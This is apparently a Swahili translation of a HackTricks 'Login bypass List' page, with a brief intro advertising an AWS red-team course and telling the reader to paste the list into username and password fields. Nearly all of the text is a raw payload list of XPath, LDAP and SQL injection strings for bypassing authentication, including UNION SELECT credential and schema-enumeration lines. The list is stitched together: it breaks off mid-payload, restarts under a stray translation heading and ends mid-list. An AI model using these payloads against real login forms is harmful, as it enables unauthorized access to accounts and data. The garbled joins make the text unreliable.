Login bypass List

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Orodha hii ina mizigo ya kudukua kwa njia ya XPath, LDAP na SQL injection(kwa utaratibu huo).

Njia ya kutumia orodha hii ni kuweka mistari 200 ya kwanza kama jina la mtumiaji na nywila. Kisha, weka orodha kamili kwanza kwenye kisanduku cha jina la mtumiaji na kisha kwenye kisanduku cha nywila huku ukiweka nywila fulani (kama Pass1234.) au jina la mtumiaji lililofahamika (kama admin).

admin
password
1234
123456
root
toor
test
guest
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
1234
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "admin", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
==
=
'
' --
' #
' –
'--
'/*
'#
" --
" #
"/*
' and 1='1
' and a='a
or true
' or ''='
" or ""="
1′) and '1′='1–
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '7110eda4d09e062aa5e4a390b0a572ac0d2c0220
" AND 1=0 UNION ALL SELECT "", "7110eda4d09e062aa5e4a390b0a572ac0d2c0220
and 1=1
and 1=1–
' and 'one'='one
' and 'one'='one–
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
like '%'
or 0=0 --
or 0=0 #
or 0=0 –
' or         0=0 #
' or 0=0 --
' or 0=0 #
' or 0=0 –
" or 0=0 --
" or 0=0 #
" or 0=0 –
%' or '0'='0
or 1=1–
' or 1=1--
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1–
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
'or'1=1
'or'1=1′
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1–
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1′='1–
) or ('1′='1–
' or 1=1 LIMIT 1;#
'or 1=1 or ''='
"or 1=1 or ""="
' or a=a--
' or a=a–
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one–
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
') or ('x'='x
' OR 'x'='x'#;
'=' 'or' and '=' 'or'
' UNION ALL SELECT 1, @@version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROM information_Schema.tables;#
admin' and substring(password/text(),1,1)='7
' and substring(password/text(),1,1)='7
"
'-- 2
"-- 2
'='
0'&lt;'2
"="
0"&lt;"2
')
")
')-- 2
')/*
')#
")-- 2
") #
")/*
')-('
')&('
')^('
')*('
')=('
0')&lt;('2
")-("
")&("
")^("
")*("
")=("
0")&lt;("2
'-''-- 2
'-''#
'-''/*
'&''-- 2
'&''#
'&''/*
'^''-- 2
'^''#
'^''/*
'*''-- 2
'*''#
'*''/*
'=''-- 2
'=''#
'=''/*
0'&lt;'2'-- 2
0'&lt;'2'#
0'&lt;'2'/*
"-""-- 2
"-""#
"-""/*
"&""-- 2
"&""#
"&""/*
"^""-- 2
"^""#
"^""/*
"*""-- 2
"*""#
"*""/*
"=""-- 2
"=""#
"=""/*
0"&lt;"2"-- 2
0"&lt;"2"#
0"&lt;"2"/*
### SQL Login Bypass

- `')-''-- 2`
- `')-''#`
- `')-''/*`
- `')&''-- 2`
- `')&''#`
- `')&''/*`
- `')^''-- 2`
- `')^''#`
- `')^''/*`
- `')*''-- 2`
- `')*''#`
- `')*''/*`
- `')=''-- 2`
- `')=''#`
- `')=''/*`
- `0')&lt;'2'-- 2`
- `0')&lt;'2'#`
- `0')&lt;'2'/*`
- `")-""-- 2`
- `")-""#`
- `")-""/*`
- `")&""-- 2`
- `")&""#`
- `")&""/*`
- `")^""-- 2`
- `")^""#`
- `")^""/*`
- `")*""-- 2`
- `")*""#`
- `")*""/*`
- `")=""-- 2`
- `")=""#`
- `")=""/*`
- `0")&lt;"2-- 2`
- `0")&lt;"2#`
- `0")&lt;"2/*`
- `'oR'2`
- `'oR'2'-- 2`
- `'oR'2'#`
- `'oR'2'/*`
- `'oR'2'oR'`
- `'oR(2)-- 2`
- `'oR(2)#`
- `'oR(2)/*`
- `'oR(2)oR'`
- `'oR 2-- 2`
- `'oR 2#`
- `'oR 2/*`
- `'oR 2 oR'`
- `'oR/**/2-- 2`
- `'oR/**/2#`
- `'oR/**/2/*`
- `'oR/**/2/**/oR'`
- `"oR"2`
- `"oR"2"-- 2`
- `"oR"2"#`
- `"oR"2"/*`
- `"oR"2"oR"`
- `"oR(2)-- 2`
- `"oR(2)#`
- `"oR(2)/*`
- `"oR(2)oR"`
- `"oR 2-- 2`
- `"oR 2#`
- `"oR 2/*`
- `"oR 2 oR"`
- `"oR/**/2-- 2`
- `"oR/**/2#`
- `"oR/**/2/*`
- `"oR/**/2/**/oR"`
- `'oR'2'='2`
- `'oR'2'='2'oR'`
- `'oR'2'='2'-- 2`
- `'oR'2'='2'#`
- `'oR'2'='2'/*`
- `'oR 2=2-- 2`
- `'oR 2=2#`
- `'oR 2=2/*`
- `'oR 2=2 oR'`
- `'oR/**/2=2-- 2`
- `'oR/**/2=2#`
- `'oR/**/2=2/*`
- `'oR/**/2=2/**/oR'`
- `'oR(2)=2-- 2`
- `'oR(2)=2#`
- `'oR(2)=2/*`
- `'oR(2)=(2)oR'`
- `'oR'2'='2' LimIT 1-- 2`
- `'oR'2'='2' LimIT 1#`
- `'oR'2'='2' LimIT 1/*`
- `'oR(2)=(2)LimIT(1)-- 2`
- `'oR(2)=(2)LimIT(1)#`
- `'oR(2)=(2)LimIT(1)/*`
- `"oR"2"="2`
- `"oR"2"="2"oR"`
- `"oR"2"="2"-- 2`
- `"oR"2"="2"#`
- `"oR"2"="2"/*`
- `"oR 2=2-- 2`
- `"oR 2=2#`
- `"oR 2=2/*`
- `"oR 2=2 oR"`
- `"oR/**/2=2-- 2`
- `"oR/**/2=2#`
- `"oR/**/2=2/*`
- `"oR/**/2=2/**/oR"`
- `"oR(2)=2-- 2`
- `"oR(2)=2#`
- `"oR(2)=2/*`
- `"oR(2)=(2)oR"`
- `"oR"2"="2" LimIT 1-- 2`
- `"oR"2"="2" LimIT 1#`
- `"oR"2"="2" LimIT 1/*`
- `"oR(2)=(2)LimIT(1)-- 2`
- `"oR(2)=(2)LimIT(1)#`
- `"oR(2)=(2)LimIT(1)/*`
- `'oR true-- 2`
- `'oR true#`
- `'oR true/*`
- `'oR true oR'`
- `'oR(true)-- 2`
- `'oR(true)#`
- `'oR(true)/*`
- `'oR(true)oR'`
- `'oR/**/true-- 2`
- `'oR/**/true#`
- `'oR/**/true/*`
- `'oR/**/true/**/oR'`
- `"oR true-- 2`
- `"oR true#`
- `"oR true/*`
- `"oR true oR"`
- `"oR(true)-- 2`
- `"oR(true)#`
- `"oR(true)/*`
- `"oR(true)oR"`
- `"oR/**/true-- 2`
- `"oR/**/true#`
- `"oR/**/true/*`
- `"oR/**/true/**/oR"`
- `'oR'2'LiKE'2`
- `'oR'2'LiKE'2'-- 2`
- `'oR'2'LiKE'2'#`
- `'oR'2'LiKE'2'/*`
- `'oR'2'LiKE'2'oR'`
- `'oR(2)LiKE(2)-- 2`
- `'oR(2)LiKE(2)#`
- `'oR(2)LiKE(2)/*`
- `'oR(2)LiKE(2)oR'`
- `"oR"2"LiKE"2`
- `"oR"2"LiKE"2"-- 2`
- `"oR"2"LiKE"2"#`
- `"oR"2"LiKE"2"/*`
- `"oR"2"LiKE"2"oR"`
- `"oR(2)LiKE(2)-- 2`
- `"oR(2)LiKE(2)#`
- `"oR(2)LiKE(2)/*`
- `"oR(2)LiKE(2)oR"`
- `admin`
- `admin'-- 2`
- `admin'#`
- `admin"-- 2`
- `admin"#`
- `ffifdyop`
- `' UniON SElecT 1,2-- 2`
- `' UniON SElecT 1,2,3-- 2`
- `' UniON SElecT 1,2,3,4-- 2`
- `' UniON SElecT 1,2,3,4,5-- 2`
- `' UniON SElecT 1,2#`
- `' UniON SElecT 1,2,3#`
- `' UniON SElecT 1,2,3,4#`
- `' UniON SElecT 1,2,3,4,5#`
- `'UniON(SElecT(1),2)-- 2`
- `'UniON(SElecT(1),2,3)-- 2`
- `'UniON(SElecT(1),2,3,4)-- 2`
- `'UniON(SElecT(1),2,3,4,5)-- 2`
- `'UniON(SElecT(1),2)#`
- `'UniON(SElecT(1),2,3)#`
- `'UniON(SElecT(1),2,
### SQL Login Bypass

#### Swahili Translation:

'||2=(2)LimIT(1)-- 2
'||2=(2)LimIT(1)#
'||2=(2)LimIT(1)/*
"||2=(2)LimIT(1)-- 2
"||2=(2)LimIT(1)#
"||2=(2)LimIT(1)/*
'||true-- 2
'||true#
'||true/*
'||true||'
"||true-- 2
"||true#
"||true/*
"||true||"
'||'2'LiKE'2
'||'2'LiKE'2'-- 2
'||'2'LiKE'2'#
'||'2'LiKE'2'/*
'||'2'LiKE'2'||'
'||(2)LiKE(2)-- 2
'||(2)LiKE(2)#
'||(2)LiKE(2)/*
'||(2)LiKE(2)||'
"||"2"LiKE"2
"||"2"LiKE"2"-- 2
"||"2"LiKE"2"#
"||"2"LiKE"2"/*
"||"2"LiKE"2"||"
"||(2)LiKE(2)-- 2
"||(2)LiKE(2)#
"||(2)LiKE(2)/*
"||(2)LiKE(2)||"
')oR('2
')oR'2'-- 2
')oR'2'#
')oR'2'/*
')oR'2'oR('
')oR(2)-- 2
')oR(2)#
')oR(2)/*
')oR(2)oR('
')oR 2-- 2
')oR 2#
')oR 2/*
')oR 2 oR('
')oR/**/2-- 2
')oR/**/2#
')oR/**/2/*
')oR/**/2/**/oR('
")oR("2
")oR"2"-- 2
")oR"2"#
")oR"2"/*
")oR"2"oR("
")oR(2)-- 2
")oR(2)#
")oR(2)/*
")oR(2)oR("
")oR 2-- 2